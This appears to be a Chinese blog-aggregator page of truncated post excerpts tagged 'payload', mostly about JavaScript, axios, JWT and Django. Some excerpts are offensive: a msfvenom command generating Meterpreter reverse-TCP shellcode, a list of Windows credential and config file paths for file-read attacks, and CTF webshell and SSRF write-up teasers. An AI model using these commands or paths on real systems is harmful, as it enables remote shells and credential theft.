const allArr = [] const oldArr = payload.data for (let i = 0; i < oldArr.length; i += 1) { let flag = true for (let j = 0; j < allArr.length; j += 1) ...
分类:
编程语言 时间:
2020-07-23 16:35:10
阅读次数:
88
axios({ method: 'get', url: url, params: payload, responseType: 'blob', // 必须加上 headers: { 'Content-Type': 'multipart/x-www-form-urlencoded' } }) axio ...
分类:
移动开发 时间:
2020-07-20 15:17:39
阅读次数:
104
jsON Web Token(JWT)是一个非常轻巧的规范。这个规范允许我们使用JWT在用户和服务器之间传递安全可靠的信息。其JWT的组成: 一个JWT实际上就是一个字符串,它由三部分组成,头部、载荷与签名。 载荷(Payload) { "iss": "Online JWT Builder", "i ...
分类:
其他好文 时间:
2020-07-17 19:47:02
阅读次数:
68
1.获取服务列表 ProcessEngine engine = ProcessEngines.getDefaultProcessEngine(); List tasks = engine.getTaskService().createTaskQuery().taskAssignee("oo").li ...
分类:
其他好文 时间:
2020-07-16 12:10:28
阅读次数:
62
一、自动签发 urls from rest_framework_jwt.views import obtain_jwt_token # 使用jwt自带的登录视图 urlpatterns = [ path('login/', obtain_jwt_token), ] settings import d ...
分类:
其他好文 时间:
2020-07-16 00:03:00
阅读次数:
59
信息: 题目来源:XCTF 4th-CyberEarth 标签:PHP、源码泄露、SSRF、反序列化、SQL 题目描述:工控云管理系统项目管理页面解析漏洞 解题过程 进入网站后,首先进行目录扫描: [TIME] => 2020-07-08 15:34:39.931717 [TARGET] => ht ...
分类:
其他好文 时间:
2020-07-12 20:37:25
阅读次数:
94
缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.3.60 LPORT=3333 -f c 将payload给copy下来 ...
分类:
编程语言 时间:
2020-07-11 09:26:03
阅读次数:
85
#Windows: C:boot.ini //查看系统版本 C:WindowsSystem32inetsrvMetaBase.xml //IIS配置文件 C:Windowsrepairsam //存储系统初次安装的密码 C:Program Filesmysqlmy.ini //Mysql配置 C:P ...
分类:
其他好文 时间:
2020-07-07 09:49:57
阅读次数:
73
环境:https://www.ctfhub.com/#/challenge 打开题目可以看到源码: 阅读源码发现过滤掉了f l a g . p h / ; " ' ` | [ ] _ =这些字符,并且还有一些黑名单函数。这让我联想到了P神的一篇文章无数字、字母构造webshell (https:// ...
分类:
Web程序 时间:
2020-07-06 22:44:20
阅读次数:
178
记录!!! 老项目中做图片上传,开始做的时候发现jQuery中的【$】被占用,上传的时候后台需要的是form data,浏览器传的是Request Payload请求 操作如下 解决jQuery被占用 1、var $j = jQuery.noConflict(); 缺点是当前html页面上的jq【$ ...
分类:
Web程序 时间:
2020-07-06 12:36:52
阅读次数:
65
